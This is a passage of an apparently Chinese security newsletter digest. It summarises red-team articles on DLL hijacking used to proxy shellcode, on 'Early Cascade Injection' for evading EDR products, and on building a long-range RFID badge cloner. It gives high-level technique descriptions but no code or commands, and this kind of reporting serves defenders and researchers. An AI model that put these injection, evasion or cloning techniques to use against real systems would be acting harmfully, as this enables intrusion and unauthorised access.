		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">本网页主要介绍了DLL劫持的新技术和实战应用，以及持续渗透测试（CPT）在这一领域的重要性。</span>
		</p>
	</blockquote>


	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">DLL劫持：一种新的Shellcode代理方式</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmq9olbYbLBTq8AYY0qtCp6lVzhAcgPaRicjDanJbJvG3CZrFwdibtg2zlBhNDdPsbUib2jF6bPRPtKA/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmq9olbYbLBTq8AYY0qtCp6lVzhAcgPaRicjDanJbJvG3CZrFwdibtg2zlBhNDdPsbUib2jF6bPRPtKA/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=8858225548824812"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">DLL劫持依然是一种有效的攻击手段，尽管微软采取了一些措施来减轻这些攻击，但攻击者仍然可以通过新的技术来实现代理shellcode。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">持续渗透测试（CPT）对于发现新的攻击路径和漏洞至关重要，它允许红队团队进行深入的研究和开发，以适应坚固的环境。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">简单而有效的方法，如使用process monitor来监控系统事件，可以帮助发现DLL加载的漏洞。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">DLL代理攻击是一种新的技术，它允许攻击者在不中断服务的情况下加载恶意代码。</section></li></ul>
	<br/>
	<p>🏷️: DLL劫持, 恶意代码, 网络安全, 红队工具</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x0b
			 早期级联注入技术：从Windows进程创建到隐蔽注入</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">本文介绍了一种新型的进程注入技术——早期级联注入（Early Cascade Injection），分析了Windows进程创建的用户模式部分，并探讨了多个端点检测和响应系统（EDRs）如何在进程创建过程中初始化它们的检测能力。</span>
		</p>
	</blockquote>


	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">新型隐蔽进程注入技术：Early Cascade Injection</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">早期的级联注入：从 Windows 进程创建到隐蔽注入</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmq9olbYbLBTq8AYY0qtCp6jdTn5euAryc7nEXc9ly55icI9GvyiaVg3tv81UgO94QoplnfUzsNH9kA/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmq9olbYbLBTq8AYY0qtCp6jdTn5euAryc7nEXc9ly55icI9GvyiaVg3tv81UgO94QoplnfUzsNH9kA/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=5121552144151884"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">早期级联注入是一种新型的进程注入技术，它通过操纵用户模式进程创建过程中的回调指针，避免了传统的跨进程APC排队，从而实现了对EDR的逃避。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">传统的Early Bird APC注入技术可能对现代EDR系统不再有效，因为EDR系统已经开始更早地加载其检测措施。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">EDR-Preloading技术展示了如何通过修改回调指针来在进程创建时执行代码，但它的执行受到加载器锁的限制。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">早期级联注入利用了<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">ShimGlobalOptions</code>回调指针，该指针不受加载器锁的限制，允许在进程初始化早期阶段执行代码。</section></li></ul>
	<br/>
	<p>🏷️: EDR, 进程注入, Windows, 安全检测, 技术</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x0c
			 克隆克隆器：构建自定义RFID克隆设备</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">作者在尝试构建一个长距离RFID克隆器，经过一系列的测试和调试，最终通过使用一个更强大的电源解决方案，成功增加了克隆器的读取距离。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="1" data-w="220" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=bec5ae0e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2Ficqm3vRUymZmq9olbYbLBTq8AYY0qtCp60ibbjMKk4onBMXJzPKqic3oJoV8y2FPcEl4fNslg5ym2dXicsdJmOkDLQ%2F640%3Ffrom%3Dappmsg"/>
	</section></section>

	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmq9olbYbLBTq8AYY0qtCp6LzVGpNph3TgMDOYt8lLDljaSrkaz9BvtAO8fRficLC6Y5iagJnY3rohw/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmq9olbYbLBTq8AYY0qtCp6LzVGpNph3TgMDOYt8lLDljaSrkaz9BvtAO8fRficLC6Y5iagJnY3rohw/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=4848554822825518"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">电源问题是影响RFID克隆器性能的关键因素：作者通过一系列的实验和测试，确定了电源问题是导致RFID读取距离不足的主要原因。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">对电力基础知识的理解对于解决问题至关重要：作者强调了对电压、电流和电阻的理解对于成功构建和调试硬件项目的重要性。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">实践和迭代是解决问题的关键：作者通过不断尝试和调整，逐步解决了问题，这凸显了实践和迭代在硬件黑客中的重要性。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">合适的电源设备对于项目的成功至关重要：最终，通过使用一个更适合项目需求的高功率USB电池包，作者成功解决了读取距离的问题。</section></li></ul>
	<br/>
